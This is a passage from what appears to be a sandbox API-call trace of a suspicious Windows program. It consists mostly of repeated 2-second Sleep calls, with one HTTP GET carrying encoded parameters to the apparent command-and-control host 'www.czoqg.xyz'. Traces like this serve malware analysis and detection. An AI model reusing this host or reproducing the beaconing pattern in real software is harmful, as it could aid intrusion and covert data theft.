(dwMilliseconds=0x7d0) [0245.605] Sleep (dwMilliseconds=0x7d0) [0245.641] Sleep (dwMilliseconds=0x7d0) [0245.678] Sleep (dwMilliseconds=0x7d0) [0245.716] Sleep (dwMilliseconds=0x7d0) [0245.722] Sleep (dwMilliseconds=0x7d0) [0245.724] Sleep (dwMilliseconds=0x7d0) [0245.755] Sleep (dwMilliseconds=0x7d0) [0245.790] Sleep (dwMilliseconds=0x7d0) [0245.828] Sleep (dwMilliseconds=0x7d0) [0245.865] Sleep (dwMilliseconds=0x7d0) [0245.868] Sleep (dwMilliseconds=0x7d0) [0245.910] Sleep (dwMilliseconds=0x7d0) [0245.946] Sleep (dwMilliseconds=0x7d0) [0245.982] Sleep (dwMilliseconds=0x7d0) [0246.006] Sleep (dwMilliseconds=0x7d0) [0246.008] Sleep (dwMilliseconds=0x7d0) [0246.021] Sleep (dwMilliseconds=0x7d0) [0246.057] Sleep (dwMilliseconds=0x7d0) [0246.094] Sleep (dwMilliseconds=0x7d0) [0246.133] Sleep (dwMilliseconds=0x7d0) [0246.152] Sleep (dwMilliseconds=0x7d0) [0246.153] Sleep (dwMilliseconds=0x7d0) [0246.172] Sleep (dwMilliseconds=0x7d0) [0246.210] Sleep (dwMilliseconds=0x7d0) [0246.255] Sleep (dwMilliseconds=0x7d0) [0246.292] Sleep (dwMilliseconds=0x7d0) [0246.307] Sleep (dwMilliseconds=0x7d0) [0246.331] Sleep (dwMilliseconds=0x7d0) [0246.366] Sleep (dwMilliseconds=0x7d0) [0246.409] Sleep (dwMilliseconds=0x7d0) [0246.445] Sleep (dwMilliseconds=0x7d0) [0246.452] Sleep (dwMilliseconds=0x7d0) [0246.501] Sleep (dwMilliseconds=0x7d0) [0246.539] Sleep (dwMilliseconds=0x7d0) [0246.575] Sleep (dwMilliseconds=0x7d0) [0246.613] Sleep (dwMilliseconds=0x7d0) [0246.615] Sleep (dwMilliseconds=0x7d0) [0246.650] Sleep (dwMilliseconds=0x7d0) [0246.687] Sleep (dwMilliseconds=0x7d0) [0246.725] Sleep (dwMilliseconds=0x7d0) [0246.759] Sleep (dwMilliseconds=0x7d0) [0246.761] Sleep (dwMilliseconds=0x7d0) [0246.765] Sleep (dwMilliseconds=0x7d0) [0246.802] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.czoqg.xyz", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0246.818] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fw02/?oDKX=PpF0-nRHybghQp&ZZI=i8U3GOpzdfOw2GgzvLmi5UUBcFXKNl9MVWatKm+oWi3pb1CAVMFUg5iZfze9PYgRR7t+FA==", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x1) returned 0xcc000c [0246.818] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0278.271] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0278.811] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0278.895] Sleep (dwMilliseconds=0x7d0) [0279.117] Sleep (dwMilliseconds=0x7d0) [0279.337] Sleep (dwMilliseconds=0x7d0) [0279.412] Sleep (dwMilliseconds=0x7d0) [0279.569] Sleep (dwMilliseconds=0x7d0) [0279.615] Sleep (dwMilliseconds=0x7d0) [0279.659] Sleep (dwMilliseconds=0x7d0) [0279.704] Sleep (dwMilliseconds=0x7d0) [0279.746] Sleep (dwMilliseconds=0x7d0) [0279.786] Sleep (dwMilliseconds=0x7d0) [0279.829] Sleep (dwMilliseconds=0x7d0) [0279.875] Sleep (dwMilliseconds=0x7d0) [0279.925] Sleep (dwMilliseconds=0x7d0) [0279.967] Sleep (dwMilliseconds=0x7d0) [0280.007] Sleep (dwMilliseconds=0x7d0) [0280.093] Sleep (dwMilliseconds=0x7d0) [0280.148] Sleep (dwMilliseconds=0x7d0) [0280.189] Sleep (dwMilliseconds=0x7d0) [0280.195] Sleep (dwMilliseconds=0x7d0) [0280.196] Sleep (dwMilliseconds=0x7d0) [0280.244] Sleep (dwMilliseconds=0x7d0) [0280.273] Sleep (dwMilliseconds=0x7d0) [0280.292] Sleep (dwMilliseconds=0x7d0) [0280.324] Sleep (dwMilliseconds=0x7d0) [0280.338] Sleep (dwMilliseconds=0x7d0) [0280.342] Sleep (dwMilliseconds=0x7d0) [0280.382] Sleep (dwMilliseconds=0x7d0) [0280.419] Sleep (dwMilliseconds=0x7d0) [0280.429] Sleep (dwMilliseconds=0x7d0) [0280.466] Sleep (dwMilliseconds=0x7d0) [0281.052] Sleep (dwMilliseconds=0x7d0) [0281.099] Sleep (dwMilliseconds=0x7d0) [0281.167] Sleep (dwMilliseconds=0x7d0) [0281.216] Sleep (dwMilliseconds=0x7d0) [0281.248] Sleep (dwMilliseconds=0x7d0) [0281.252] Sleep (dwMilliseconds=0x7d0) [0281.253] Sleep (dwMilliseconds=0x7d0) [0281.255] Sleep (dwMilliseconds=0x7d0) [0281.257] Sleep (dwMilliseconds=0x7d0) [0281.258] Sleep (dwMilliseconds=0x7d0) [0281.259] Sleep (dwMilliseconds=0x7d0) [0281.261] Sleep (dwMilliseconds=0x7d0) [0281.262] Sleep (dwMilliseconds=0x7d0) [0281.490] Sleep (dwMilliseconds=0x7d0) [0281.534] Sleep (dwMilliseconds=0x7d0) [0281.614] Sleep (dwMilliseconds=0x7d0) [0281.635] Sleep (dwMilliseconds=0x7d0) [0281.689] Sleep (dwMilliseconds=0x7d0) [0281.732] Sleep (dwMilliseconds=0x7d0) [0281.758] Sleep (dwMilliseconds=0x7d0) [0282.059] Sleep (dwMilliseconds=0x7d0) [0282.145] Sleep (dwMilliseconds=0x7d0) [0282.190] Sleep (dwMilliseconds=0x7d0) [0282.341] Sleep (dwMilliseconds=0x7d0) [0282.382] Sleep (dwMilliseconds=0x7d0) [0282.420] Sleep (dwMilliseconds=0x7d0) [0282.430] Sleep (dwMilliseconds=0x7d0) [0282.431] Sleep (dwMilliseconds=0x7d0) [0282.467] Sleep (dwMilliseconds=0x7d0) [0282.508] Sleep (dwMilliseconds=0x7d0) [0282.549] Sleep (dwMilliseconds=0x7d0) [0282.590] Sleep (dwMilliseconds=0x7d0) [0282.618] Sleep (dwMilliseconds=0x7d0) [0282.620] Sleep (dwMilliseconds=0x7d0) [0282.633] Sleep (dwMilliseconds=0x7d0) [0282.675] Sleep (dwMilliseconds=0x7d0) [0282.717] Sleep (dwMilliseconds=0x7d0) [0282.757] Sleep (dwMilliseconds=0x7d0) [0282.836] Sleep (dwMilliseconds=0x7d0) [0282.839] Sleep (dwMilliseconds=0x7d0) [0282.841] Sleep (dwMilliseconds=0x7d0) [0282.888] Sleep (dwMilliseconds=0x7d0) [0282.925] Sleep (dwMilliseconds=0x7d0) [0282.960] Sleep (dwMilliseconds=0x7d0) [0282.986] Sleep (dwMilliseconds=0x7d0) [0282.998] Sleep (dwMilliseconds=0x7d0) [0283.033] Sleep (dwMilliseconds=0x7d0) [0283.081] Sleep (dwMilliseconds=0x7d0) [0283.147] Sleep (dwMilliseconds=0x7d0) [0283.164] Sleep (dwMilliseconds=0x7d0) [0283.165] Sleep (dwMilliseconds=0x7d0) [0283.185] Sleep (dwMilliseconds=0x7d0) [0283.220] Sleep (dwMilliseconds=0x7d0) [0283.255] Sleep (dwMilliseconds=0x7d0) [0283.278] Sleep (dwMilliseconds=0x7d0) [0283.292] Sleep (dwMilliseconds=0x7d0) [0283.326] Sleep (dwMilliseconds=0x7d0) [0283.361] Sleep (dwMilliseconds=0x7d0) [0283.390] Sleep (dwMilliseconds=0x7d0) [0283.391] Sleep (dwMilliseconds=0x7d0) [0283.430] Sleep (dwMilliseconds=0x7d0) [0283.466] Sleep (dwMilliseconds=0x7d0) [0283.501] Sleep (dwMilliseconds=0x7d0) [0283.532] Sleep (dwMilliseconds=0x7d0) [0283.538] Sleep (dwMilliseconds=0x7d0) [0283.572] Sleep (dwMilliseconds=0x7d0) [0283.608] Sleep (dwMilliseconds=0x7d0) [0283.642] Sleep (dwMilliseconds=0x7d0) [0283.644] Sleep (dwMilliseconds=0x7d0) [0283.646] Sleep (dwMilliseconds=0x7d0) [0283.685] Sleep (dwMilliseconds=0x7d0) [0283.720] Sleep (dwMilliseconds=0x7d0) [0283.757] Sleep (dwMilliseconds=0x7d0) [0283.774] Sleep (dwMilliseconds=0x7d0) [0283.775] Sleep (dwMilliseconds=0x7d0) [0283.818] Sleep (dwMilliseconds=0x7d0) [0283.853] Sleep (dwMilliseconds=0x7d0) [0283.889] Sleep (dwMilliseconds=0x7d0) [0283.916] Sleep (dwMilliseconds=0x7d0) [0283.918] Sleep (dwMilliseconds=0x7d0) [0283.928] Sleep (dwMilliseconds=0x7d0) [0283.981] Sleep (dwMilliseconds=0x7d0) [0284.017] Sleep (dwMilliseconds=0x7d0) [0284.094] Sleep (dwMilliseconds=0x7d0) [0284.104] Sleep (dwMilliseconds=0x7d0) [0284.105] Sleep (dwMilliseconds=0x7d0) [0284.143] Sleep (dwMilliseconds=0x7d0) [0284.183] Sleep (dwMilliseconds=0x7d0) [0284.225] Sleep (dwMilliseconds=0x7d0) [0284.250] Sleep (dwMilliseconds=0x7d0) [0284.251] Sleep (dwMilliseconds=0x7d0) [0284.265] Sleep (dwMilliseconds=0x7d0) [0284.303] Sleep (dwMilliseconds=0x7d0) [0284.342] Sleep (dwMilliseconds=0x7d0) [0284.371] Sleep (dwMilliseconds=0x7d0) [0284.372] Sleep (dwMilliseconds=0x7d0) [0284.382] Sleep (dwMilliseconds=0x7d0) [0284.426] Sleep (dwMilliseconds=0x7d0) [0284.467] Sleep (dwMilliseconds=0x7d0) [0284.512] Sleep (dwMilliseconds=0x7d0) [0284.524] Sleep (dwMilliseconds=0x7d0) [0284.526] Sleep (dwMilliseconds=0x7d0) [0284.559] Sleep (dwMilliseconds=0x7d0) [0284.601] Sleep (dwMilliseconds=0x7d0) [0284.642] Sleep (dwMilliseconds=0x7d0) [0284.681] Sleep (dwMilliseconds=0x7d0) [0284.686] Sleep (dwMilliseconds=0x7d0) [0284.725] Sleep (dwMilliseconds=0x7d0) [0284.765] Sleep (dwMilliseconds=0x7d0) [0284.829] Sleep (dwMilliseconds=0x7d0) [0284.868] Sleep (dwMilliseconds=0x7d0) [0284.873] Sleep (dwMilliseconds=0x7d0) [0284.915] Sleep (dwMilliseconds=0x7d0) [0284.959] Sleep (dwMilliseconds=0x7d0) [0284.999] Sleep (dwMilliseconds=0x7d0) [0285.042] Sleep (dwMilliseconds=0x7d0) [0285.068] Sleep (dwMilliseconds=0x7d0) [0285.096] Sleep (dwMilliseconds=0x7d0) [0285.138] Sleep (dwMilliseconds=0x7d0) [0285.182] Sleep (dwMilliseconds=0x7d0) [0285.223] Sleep (dwMilliseconds=0x7d0) [0285.258] Sleep (dwMilliseconds=0x7d0) [0285.269] Sleep (dwMilliseconds=0x7d0) [0285.305] Sleep (dwMilliseconds=0x7d0) [0285.341] Sleep (dwMilliseconds=0x7d0) [0285.377] Sleep (dwMilliseconds=0x7d0) [0285.417] Sleep (dwMilliseconds=0x7d0) [0285.419] Sleep (dwMilliseconds=0x7d0) [0285.454] Sleep (dwMilliseconds=0x7d0) [0285.492] Sleep (dwMilliseconds=0x7d0) [0285.527] Sleep (dwMilliseconds=0x7d0) [0285.591] Sleep (dwMilliseconds=0x7d0) [0285.608] Sleep (dwMilliseconds=0x7d0) [0285.609] Sleep (dwMilliseconds=0x7d0) [0285.631] Sleep (dwMilliseconds=0x7d0) [0285.666] Sleep (dwMilliseconds=0x7d0) [0285.713] Sleep (dwMilliseconds=0x7d0) [0285.748] Sleep (dwMilliseconds=0x7d0) [0285.769] Sleep (dwMilliseconds=0x7d0) [0285.822] Sleep (dwMilliseconds=0x7d0) [0285.859] Sleep (dwMilliseconds=0x7d0) [0285.895] Sleep (dwMilliseconds=0x7d0) [0285.930] Sleep (dwMilliseconds=0x7d0) [0285.950] Sleep (dwMilliseconds=0x7d0) [0285.971] Sleep (dwMilliseconds=0x7d0) [0286.007] Sleep (dwMilliseconds=0x7d0) [0286.044] Sleep (dwMilliseconds=0x7d0) [0286.092] Sleep (dwMilliseconds=0x7d0) [0286.144] Sleep (dwMilliseconds=0x7d0) [0286.160] Sleep (dwMilliseconds=0x7d0) [0286.197] Sleep (dwMilliseconds=0x7d0) [0286.235] Sleep (dwMilliseconds=0x7d0) [0286.275] Sleep (dwMilliseconds=0x7d0) [0286.297] Sleep (dwMilliseconds=0x7d0) [0286.298] Sleep (dwMilliseconds=0x7d0) [0286.313] Sleep (dwMilliseconds=0x7d0) [0286.349] Sleep (dwMilliseconds=0x7d0) [0286.387] Sleep (dwMilliseconds=0x7d0) [0286.469] Sleep (dwMilliseconds=0x7d0) [0286.483] Sleep (dwMilliseconds=0x7d0) [0286.518] Sleep (dwMilliseconds=0x7d0) [0286.555] Sleep (dwMilliseconds=0x7d0) [0286.592] Sleep (dwMilliseconds=0x7d0) [0286.624] Sleep (dwMilliseconds=0x7d0) [0286.631] Sleep (dwMilliseconds=0x7d0) [0286.666] Sleep (dwMilliseconds=0x7d0) [0286.703] Sleep (dwMilliseconds=0x7d0) [0286.740] Sleep (dwMilliseconds=0x7d0) [0286.769] Sleep (dwMilliseconds=0x7d0) [0286.777] Sleep (dwMilliseconds=0x7d0) [0286.834] Sleep (dwMilliseconds=0x7d0) [0286.870] Sleep (dwMilliseconds=0x7d0) [0286.898] Sleep (dwMilliseconds=0x7d0) [0286.907] Sleep (dwMilliseconds=0x7d0) [0286.942] Sleep (dwMilliseconds=0x7d0) [0286.977] Sleep (dwMilliseconds=0x7d0) [0287.005] Sleep (dwMilliseconds=0x7d0) [0287.013] Sleep (dwMilliseconds=0x7d0) [0287.054] Sleep (dwMilliseconds=0x7d0) [0287.090] Sleep (dwMilliseconds=0x7d0) [0287.118] Sleep (dwMilliseconds=0x7d0) [0287.119] Sleep (dwMilliseconds=0x7d0) [0287.126] Sleep (dwMilliseconds=0x7d0) [0287.160] Sleep (dwMilliseconds=0x7d0) [0287.196] Sleep (dwMilliseconds=0x7d0) [0287.225] Sleep (dwMilliseconds=0x7d0) [0287.226] Sleep (dwMilliseconds=0x7d0) [0287.233] Sleep (dwMilliseconds=0x7d0) [0287.273] Sleep (dwMilliseconds=0x7d0) [0287.308] Sleep (dwMilliseconds=0x7d0) [0287.335] Sleep (dwMilliseconds=0x7d0) [0287.336] Sleep (dwMilliseconds=0x7d0) [0287.344] Sleep (dwMilliseconds=0x7d0) [0287.379] Sleep (dwMilliseconds=0x7d0) [0287.413] Sleep (dwMilliseconds=0x7d0) [0287.440] Sleep (dwMilliseconds=0x7d0) [0287.449] Sleep (dwMilliseconds=0x7d0) [0287.483] Sleep (dwMilliseconds=0x7d0) [0287.518] Sleep (dwMilliseconds=0x7d0) [0287.544] Sleep (dwMilliseconds=0x7d0) [0287.545] Sleep (dwMilliseconds=0x7d0) [0287.554] Sleep (dwMilliseconds=0x7d0) [0287.588] Sleep (dwMilliseconds=0x7d0) [0287.622] Sleep (dwMilliseconds=0x7d0) [0287.647] Sleep (dwMilliseconds=0x7d0) [0287.648] Sleep (dwMilliseconds=0x7d0) [0287.659] Sleep (dwMilliseconds=0x7d0) [0287.694] Sleep (dwMilliseconds=0x7d0) [0287.729] Sleep (dwMilliseconds=0x7d0) [0287.752] Sleep (dwMilliseconds=0x7d0) [0287.753] Sleep (dwMilliseconds=0x7d0) [0287.765] Sleep (dwMilliseconds=0x7d0) [0287.819] Sleep (dwMilliseconds=0x7d0) [0287.854] Sleep (dwMilliseconds=0x7d0) [0287.875] Sleep (dwMilliseconds=0x7d0) [0287.890] Sleep (dwMilliseconds=0x7d0) [0287.925] Sleep (dwMilliseconds=0x7d0) [0287.961] Sleep (dwMilliseconds=0x7d0) [0287.992] Sleep (dwMilliseconds=0x7d0) [0287.998] Sleep (dwMilliseconds=0x7d0) [0288.033] Sleep (dwMilliseconds=0x7d0) [0288.075] Sleep (dwMilliseconds=0x7d0) [0288.110] Sleep (dwMilliseconds=0x7d0) [0288.117] Sleep (dwMilliseconds=0x7d0) [0288.118] Sleep (dwMilliseconds=0x7d0) [0288.148] Sleep (dwMilliseconds=0x7d0) [0288.263] Sleep (dwMilliseconds=0x7d0) [0288.302] Sleep (dwMilliseconds=0x7d0) [0288.328] Sleep (dwMilliseconds=0x7d0) [0288.329] Sleep (dwMilliseconds=0x7d0) [0288.338] Sleep (dwMilliseconds=0x7d0) [0288.372] Sleep (dwMilliseconds=0x7d0) [0288.409] Sleep (dwMilliseconds=0x7d0) [0288.458] Sleep (dwMilliseconds=0x7d0) [0288.462] Sleep (dwMilliseconds=0x7d0) [0288.463] Sleep (dwMilliseconds=0x7d0) [0288.494] Sleep (dwMilliseconds=0x7d0) [0288.529] Sleep (dwMilliseconds=0x7d0) [0288.564] Sleep (dwMilliseconds=0x7d0) [0288.571] Sleep (dwMilliseconds=0x7d0) [0288.573] Sleep (dwMilliseconds=0x7d0) [0288.601] Sleep (dwMilliseconds=0x7d0) [0288.636] Sleep (dwMilliseconds=0x7d0) [0288.671] Sleep (dwMilliseconds=0x7d0) [0288.682] Sleep (dwMilliseconds=0x7d0) [0288.709] Sleep (dwMilliseconds=0x7d0) [0288.744] Sleep (dwMilliseconds=0x7d0) [0288.781] Sleep (dwMilliseconds=0x7d0) [0288.836] Sleep (dwMilliseconds=0x7d0) [0288.847] Sleep (dwMilliseconds=0x7d0) [0288.881] Sleep (dwMilliseconds=0x7d0) [0288.916] Sleep (dwMilliseconds=0x7d0) [0288.977] Sleep (dwMilliseconds=0x7d0) [0288.979] Sleep (dwMilliseconds=0x7d0) [0289.015] Sleep (dwMilliseconds=0x7d0) [0289.059] Sleep (dwMilliseconds=0x7d0) [0289.095] Sleep (dwMilliseconds=0x7d0) [0289.121] Sleep (dwMilliseconds=0x7d0) [0289.133] Sleep (dwMilliseconds=0x7d0) [0289.169] Sleep (dwMilliseconds=0x7d0) [0289.205] Sleep (dwMilliseconds=0x7d0) [0289.249] Sleep (dwMilliseconds=0x7d0) [0289.279] Sleep (dwMilliseconds=0x7d0) [0289.287] Sleep (dwMilliseconds=0x7d0) [0289.322] Sleep (dwMilliseconds=0x7d0) [0289.356] Sleep (dwMilliseconds=0x7d0) [0289.391] Sleep (dwMilliseconds=0x7d0) [0289.393] Sleep (dwMilliseconds=0x7d0) [0289.428] Sleep (dwMilliseconds=0x7d0) [0289.465] Sleep (dwMilliseconds=0x7d0) [0289.513] Sleep (dwMilliseconds=0x7d0) [0289.538] Sleep (dwMilliseconds=0x7d0) [0289.552] Sleep (dwMilliseconds=0x7d0) [0289.587] Sleep (dwMilliseconds=0x7d0) [0289.624] Sleep (dwMilliseconds=0x7d0) [0289.659] Sleep (dwMilliseconds=0x7d0) [0289.692] Sleep (dwMilliseconds=0x7d0) [0289.694] Sleep (dwMilliseconds=0x7d0) [0289.698] Sleep (dwMilliseconds=0x7d0) [0289.733] Sleep (dwMilliseconds=0x7d0) [0289.770] Sleep (dwMilliseconds=0x7d0) [0289.827] Sleep (dwMilliseconds=0x7d0) [0289.838] Sleep (dwMilliseconds=0x7d0) [0289.864] Sleep (dwMilliseconds=0x7d0) [0289.899] Sleep (dwMilliseconds=0x7d0) [0289.936] Sleep (dwMilliseconds=0x7d0) [0289.972] Sleep (dwMilliseconds=0x7d0) [0289.978] Sleep (dwMilliseconds=0x7d0) [0289.980] Sleep (dwMilliseconds=0x7d0) [0290.010] Sleep (dwMilliseconds=0x7d0) [0290.045] Sleep (dwMilliseconds=0x7d0) [0290.088] Sleep (dwMilliseconds=0x7d0) [0290.100] Sleep (dwMilliseconds=0x7d0) [0290.102] Sleep (dwMilliseconds=0x7d0) [0290.125] Sleep (dwMilliseconds=0x7d0) [0290.160] Sleep (dwMilliseconds=0x7d0) [0290.195] Sleep (dwMilliseconds=0x7d0) [0290.223] Sleep (dwMilliseconds=0x7d0) [0290.225] Sleep (dwMilliseconds=0x7d0) [0290.233] Sleep (dwMilliseconds=0x7d0) [0290.269] Sleep (dwMilliseconds=0x7d0) [0290.305] Sleep (dwMilliseconds=0x7d0) [0290.341] Sleep (dwMilliseconds=0x7d0) [0290.353] Sleep (dwMilliseconds=0x7d0) [0290.354] Sleep (dwMilliseconds=0x7d0) [0290.379] Sleep (dwMilliseconds=0x7d0) [0290.413] Sleep (dwMilliseconds=0x7d0) [0290.449] Sleep (dwMilliseconds=0x7d0) [0290.466] Sleep (dwMilliseconds=0x7d0) [0290.467] Sleep (dwMilliseconds=0x7d0) [0290.487] Sleep (dwMilliseconds=0x7d0) [0290.524] Sleep (dwMilliseconds=0x7d0) [0290.561] Sleep (dwMilliseconds=0x7d0) [0290.583] Sleep (dwMilliseconds=0x7d0) [0290.584] Sleep (dwMilliseconds=0x7d0) [0290.597] Sleep (dwMilliseconds=0x7d0) [0290.633] Sleep (dwMilliseconds=0x7d0) [0290.670] Sleep (dwMilliseconds=0x7d0) [0290.706] Sleep (dwMilliseconds=0x7d0) [0290.732] Sleep (dwMilliseconds=0x7d0) [0290.734] Sleep (dwMilliseconds=0x7d0) [0290.744] Sleep (dwMilliseconds=0x7d0) [0290.780] Sleep (dwMilliseconds=0x7d0) [0290.842] Sleep (dwMilliseconds=0x7d0) [0290.880] Sleep (dwMilliseconds=0x7d0) [0290.916] Sleep (dwMilliseconds=0x7d0) [0290.918] Sleep (dwMilliseconds=0x7d0) [0290.953] Sleep (dwMilliseconds=0x7d0) [0290.989] Sleep (dwMilliseconds=0x7d0) [0291.026] Sleep (dwMilliseconds=0x7d0) [0291.072] Sleep (dwMilliseconds=0x7d0) [0291.082] Sleep (dwMilliseconds=0x7d0) [0291.110] Sleep (dwMilliseconds=0x7d0) [0291.145] Sleep (dwMilliseconds=0x7d0) [0291.182] Sleep (dwMilliseconds=0x7d0) [0291.218] Sleep (dwMilliseconds=0x7d0) [0291.235] Sleep (dwMilliseconds=0x7d0) [0291.256] Sleep (dwMilliseconds=0x7d0) [0291.292] Sleep (dwMilliseconds=0x7d0) [0291.333] Sleep (dwMilliseconds=0x7d0) [0291.370] Sleep (dwMilliseconds=0x7d0) [0291.373] Sleep (dwMilliseconds=0x7d0) [0291.407] Sleep (dwMilliseconds=0x7d0) [0291.442] Sleep (dwMilliseconds=0x7d0) [0291.481] Sleep (dwMilliseconds=0x7d0) [0291.505] Sleep (dwMilliseconds=0x7d0) [0291.519] Sleep (dwMilliseconds=0x7d0) [0291.554] Sleep (dwMilliseconds=0x7d0) [0291.589] Sleep (dwMilliseconds=0x7d0) [0291.626] Sleep (dwMilliseconds=0x7d0) [0291.657] Sleep (dwMilliseconds=0x7d0) [0291.663] Sleep (dwMilliseconds=0x7d0) [0291.698] Sleep (dwMilliseconds=0x7d0) [0291.733] Sleep (dwMilliseconds=0x7d0) [0291.770] Sleep (dwMilliseconds=0x7d0) [0291.832] Sleep (dwMilliseconds=0x7d0) [0291.841] Sleep (dwMilliseconds=0x7d0) [0291.870] Sleep (dwMilliseconds=0x7d0) [0291.905] Sleep (dwMilliseconds=0x7d0) [0291.941] Sleep (dwMilliseconds=0x7d0) [0291.964] Sleep (dwMilliseconds=0x7d0) [0291.977] Sleep (dwMilliseconds=0x7d0) [0292.012] Sleep (dwMilliseconds=0x7d0) [0292.058] Sleep (dwMilliseconds=0x7d0) [0292.095] Sleep (dwMilliseconds=0x7d0) [0292.124] Sleep (dwMilliseconds=0x7d0) [0292.126] Sleep (dwMilliseconds=0x7d0) [0292.133] Sleep (dwMilliseconds=0x7d0) [0292.168] Sleep (dwMilliseconds=0x7d0) [0292.204] Sleep (dwMilliseconds=0x7d0) [0292.241] Sleep (dwMilliseconds=0x7d0) [0292.277] Sleep (dwMilliseconds=0x7d0) [0292.281] Sleep (dwMilliseconds=0x7d0) [0292.315] Sleep (dwMilliseconds=0x7d0) [0292.351] Sleep (dwMilliseconds=0x7d0) [0292.389] Sleep (dwMilliseconds=0x7d0) [0292.425] Sleep (dwMilliseconds=0x7d0) [0292.441] Sleep (dwMilliseconds=0x7d0) [0292.443] Sleep (dwMilliseconds=0x7d0) [0292.464] Sleep (dwMilliseconds=0x7d0) [0292.498] Sleep (dwMilliseconds=0x7d0) [0292.534] Sleep (dwMilliseconds=0x7d0) [0292.561] Sleep (dwMilliseconds=0x7d0) [0292.562] Sleep (dwMilliseconds=0x7d0) [0292.572] Sleep (dwMilliseconds=0x7d0) [0292.607] Sleep (dwMilliseconds=0x7d0) [0292.643] Sleep (dwMilliseconds=0x7d0) [0292.680] Sleep (dwMilliseconds=0x7d0) [0292.709] Sleep (dwMilliseconds=0x7d0) [0292.717] Sleep (dwMilliseconds=0x7d0) [0292.752] Sleep (dwMilliseconds=0x7d0) [0292.813] Sleep (dwMilliseconds=0x7d0) [0292.849] Sleep (dwMilliseconds=0x7d0) [0292.865] Sleep (dwMilliseconds=0x7d0) [0292.867] Sleep (dwMilliseconds=0x7d0) [0292.885] Sleep (dwMilliseconds=0x7d0) [0292.920] Sleep (dwMilliseconds=0x7d0) [0292.955] Sleep (dwMilliseconds=0x7d0) [0292.977] Sleep (dwMilliseconds=0x7d0) [0292.978] Sleep (dwMilliseconds=0x7d0) [0293.106] Sleep (dwMilliseconds=0x7d0) [0293.142] Sleep (dwMilliseconds=0x7d0) [0293.177] Sleep (dwMilliseconds=0x7d0) [0293.204] Sleep (dwMilliseconds=0x7d0) [0293.206] Sleep (dwMilliseconds=0x7d0) [0293.213] Sleep (dwMilliseconds=0x7d0) [0293.247] Sleep (dwMilliseconds=0x7d0) [0293.282] Sleep (dwMilliseconds=0x7d0) [0293.318] Sleep (dwMilliseconds=0x7d0) [0293.326] Sleep (dwMilliseconds=0x7d0) [0293.355] Sleep (dwMilliseconds=0x7d0) [0293.392] Sleep (dwMilliseconds=0x7d0) [0293.428] Sleep (dwMilliseconds=0x7d0) [0293.459] Sleep (dwMilliseconds=0x7d0) [0293.465] Sleep (dwMilliseconds=0x7d0) [0293.500] Sleep (dwMilliseconds=0x7d0) [0293.536] Sleep (dwMilliseconds=0x7d0) [0293.570] Sleep (dwMilliseconds=0x7d0) [0293.574] Sleep (dwMilliseconds=0x7d0) [0293.575] Sleep (dwMilliseconds=0x7d0) [0293.608] Sleep (dwMilliseconds=0x7d0) [0293.644] Sleep (dwMilliseconds=0x7d0) [0293.680] Sleep (dwMilliseconds=0x7d0) [0293.712] Sleep (dwMilliseconds=0x7d0) [0293.713] Sleep (dwMilliseconds=0x7d0) [0293.717] Sleep (dwMilliseconds=0x7d0) [0293.751] Sleep (dwMilliseconds=0x7d0) [0293.809] Sleep (dwMilliseconds=0x7d0) [0293.845] Sleep (dwMilliseconds=0x7d0) [0293.847] Sleep (dwMilliseconds=0x7d0) [0293.881] Sleep (dwMilliseconds=0x7d0) [0293.916] Sleep (dwMilliseconds=0x7d0) [0293.951] Sleep (dwMilliseconds=0x7d0) [0293.961] Sleep (dwMilliseconds=0x7d0) [0293.988] Sleep (dwMilliseconds=0x7d0) [0294.023] Sleep (dwMilliseconds=0x7d0) [0294.066] Sleep (dwMilliseconds=0x7d0) [0294.089] Sleep (dwMilliseconds=0x7d0) [0294.104] Sleep (dwMilliseconds=0x7d0) [0294.141] Sleep (dwMilliseconds=0x7d0) [0294.177] Sleep (dwMilliseconds=0x7d0) [0294.213] Sleep (dwMilliseconds=0x7d0) [0294.245] Sleep (dwMilliseconds=0x7d0) [0294.251] Sleep (dwMilliseconds=0x7d0) [0294.287] Sleep (dwMilliseconds=0x7d0) [0294.324] Sleep (dwMilliseconds=0x7d0) [0294.361] Sleep (dwMilliseconds=0x7d0) [0294.399] Sleep (dwMilliseconds=0x7d0) [0294.400] Sleep (dwMilliseconds=0x7d0) [0294.435] Sleep (dwMilliseconds=0x7d0) [0294.472] Sleep (dwMilliseconds=0x7d0) [0294.508] Sleep (dwMilliseconds=0x7d0) [0294.542] Sleep (dwMilliseconds=0x7d0) [0294.543] Sleep (dwMilliseconds=0x7d0) [0294.547] Sleep (dwMilliseconds=0x7d0) [0294.583] Sleep (dwMilliseconds=0x7d0) [0294.620] Sleep (dwMilliseconds=0x7d0) [0294.655] Sleep (dwMilliseconds=0x7d0) [0294.691] Sleep (dwMilliseconds=0x7d0) [0294.693] Sleep (dwMilliseconds=0x7d0) [0294.729] Sleep (dwMilliseconds=0x7d0) [0294.766] Sleep (dwMilliseconds=0x7d0) [0294.826] Sleep (dwMilliseconds=0x7d0) [0294.863] Sleep (dwMilliseconds=0x7d0) [0294.867] Sleep (dwMilliseconds=0x7d0) [0294.868] Sleep (dwMilliseconds=0x7d0) [0294.900] Sleep (dwMilliseconds=0x7d0) [0294.936] Sleep (dwMilliseconds=0x7d0) [0294.971] Sleep (dwMilliseconds=0x7d0) [0295.008] Sleep (dwMilliseconds=0x7d0) [0295.017] Sleep (dwMilliseconds=0x7d0) [0295.018] Sleep (dwMilliseconds=0x7d0) [0295.053] Sleep (dwMilliseconds=0x7d0) [0295.088] Sleep (dwMilliseconds=0x7d0) [0295.124] Sleep (dwMilliseconds=0x7d0) [0295.136] Sleep (dwMilliseconds=0x7d0) [0295.137] Sleep (dwMilliseconds=0x7d0) [0295.161] Sleep (dwMilliseconds=0x7d0) [0295.195] Sleep (dwMilliseconds=0x7d0) [0295.232] Sleep (dwMilliseconds=0x7d0) [0295.266] Sleep (dwMilliseconds=0x7d0) [0295.268] Sleep (dwMilliseconds=0x7d0) [0295.270] Sleep (dwMilliseconds=0x7d0) [0295.305] Sleep (dwMilliseconds=0x7d0) [0295.341] Sleep (dwMilliseconds=0x7d0) 